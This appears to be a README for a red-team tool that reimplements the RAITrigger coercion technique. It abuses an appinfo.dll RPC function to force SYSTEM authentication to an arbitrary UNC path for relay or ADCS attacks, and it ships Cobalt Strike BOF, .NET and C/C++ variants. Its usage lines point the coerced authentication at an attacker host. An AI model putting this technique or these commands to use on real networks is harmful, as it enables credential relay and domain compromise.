This project is based on the original RAITrigger technique that abuses the RAiForceElevationPromptForCOM RPC function in appinfo.dll to trigger SYSTEM authentication to an arbitrary UNC path. This can be useful for relaying or ADCS attacks in domain environments.
I've reimplemented the trigger logic from scratch, focusing on manual use of NdrClientCall3 instead of relying on the NtApiDotNet library. After some trial and error, we managed to build both a minimal C# version (fully removing the dependency on NtApiDotNet) and a BOF version for Cobalt Strike.
Depending on your setup, this can now be triggered directly from Beacon or from a .NET implant, giving you options for different opsec scenarios.
raibof \\attacker-ip\share\file.exeraibof \\hostname@80\share\file.exeRAIBOFTrigger– BOF payloadRAICSTrigger– .NET Framework Payload (no deps)RAICTrigger– Standard C/C++ MIDL Implementation
- All payloads are intended to be compiled for 64-bit targets only.
- For the BOF, use the provided Makefile with MinGW; the MSVC build.bat is currently non-functional.
For more information, I'll suggest visiting the original repository: RAITrigger